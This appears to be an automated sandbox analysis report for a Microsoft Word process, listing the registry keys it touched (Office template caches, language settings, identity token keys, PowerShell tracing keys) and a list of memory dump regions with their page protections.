HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851224
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM04033927
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03457485
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03457491
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851225
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03457496
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM10001115
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328932
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328935
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03457503
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328940
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328998
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03457510
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851227
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM04033929
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328972
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328951
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033
TM02835233
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328975
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328983
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328986
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851226
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM04033937
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328990
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03457515
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03090434
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
NextUpdate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
LastUpdate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
NextUpdate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
LastUpdate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
NextUpdate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
LastUpdate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033
NextUpdate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033
LastUpdate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-CH
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-GB
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet
msoridShouldUseReauthRequestProxy
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common
SessionId
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\7944
0
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=8192&uilcid=1033&build=16.0.16827&crev=3\0
FilePath
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=8192&uilcid=1033&build=16.0.16827&crev=3\0
StartDate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=8192&uilcid=1033&build=16.0.16827&crev=3\0
EndDate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\7944
0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache
LastClean
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
ChunkCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word
Expires
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\7944
0
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming
RoamingConfigurableSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Property
0018400CF081ADAB
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935}
DeviceTicket
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328919
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328986
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328925
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328972
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851224
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328884
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851223
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328935
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03090430
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03457444
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851218
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328975
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328951
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328990
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851227
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328908
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033
TM03998158
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328905
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851222
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851217
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851226
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851225
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851219
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03457491
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328916
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03090434
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851221
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03457496
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328998
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851216
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328893
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM10001115
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033
TM01840907
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033
TM02835233
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328932
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03457475
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
TM02851220
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328940
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
TM03328983
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03457515
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03457503
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM04033917
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03457510
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM10001114
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM04033919
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM04033925
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM04033921
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM04033929
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM03457485
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM04033927
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
TM04033937
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033
TM03998159
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 254 hidden registries, click here to show them.

Memdumps

page read and write
7AEE000
stack
page read and write
5BC46FE000
stack
page read and write
2A910010000
trusted library allocation
page read and write
2AE0000
heap
page read and write
7FF7BE510000
trusted library allocation
page read and write
60A5000
heap
page read and write
28C558B0000
trusted library allocation
page read and write
6081000
heap
page read and write
24A00036000
trusted library allocation
page read and write
32D3000
trusted library allocation
page execute and read and write
7FF7BE615000
trusted library allocation
page read and write
2A975510000
heap
page read and write
2A9757C0000
heap
page readonly
7C30000
trusted library allocation
page read and write
608F000
heap
page read and write
5BC4678000
stack
page read and write
7FF7BE484000
trusted library allocation
page read and write
7FF7BE480000
trusted library allocation
page read and write
47F0000
trusted library allocation
page read and write
CE8CBFE000
stack
page read and write
481A000
trusted library allocation
page read and write
2A975660000
heap
page read and write
7FF7BE6D0000
trusted library allocation
page read and write
28CE000
stack
page read and write
2A52B540000
heap
page read and write
7FF7BE5A0000
trusted library allocation
page execute and read and write
7FF7BE6A0000
trusted library allocation
page read and write
5B2A000
heap
page read and write
24A6AC50000
heap
page read and write
28C500AD000
heap
page read and write
24A6CD33000
trusted library allocation
page read and write
2A97771B000
heap
page read and write
3510000
heap
page read and write
2A977047000
heap
page execute and read and write
7FF7BE750000
trusted library allocation
page read and write
2A975613000
heap
page read and write
7FF7BE780000
trusted library allocation
page read and write
2A9757F5000
heap
page read and write
5B1E000
stack
page read and write
28C556DC000
heap
page read and write
60BE000
heap
page read and write
5770000
trusted library allocation
page read and write
514E000
stack
page read and write
7FF7BE520000
trusted library allocation
page execute and read and write
24A10067000
trusted library allocation
page read and write
23D761B0000
heap
page read and write
2A977040000
heap
page execute and read and write
4B6E000
stack
page read and write
8FD757E000
unkown
page readonly
8FD767B000
stack
page read and write
7FF7BE730000
trusted library allocation
page read and write
24A6AB8F000
heap
page read and write
4DFE000
stack
page read and write
8F1000
heap
page read and write
2A97798F000
heap
page read and write
4F50000
heap
page read and write
F71D6FE000
stack
page read and write
4DC8000
heap
page read and write
7FF7BE7A0000
trusted library allocation
page read and write
D3C000
stack
page read and write
7940000
heap
page read and write
F236F7E000
stack
page read and write
24A10011000
trusted library allocation
page read and write
2F80000
heap
page read and write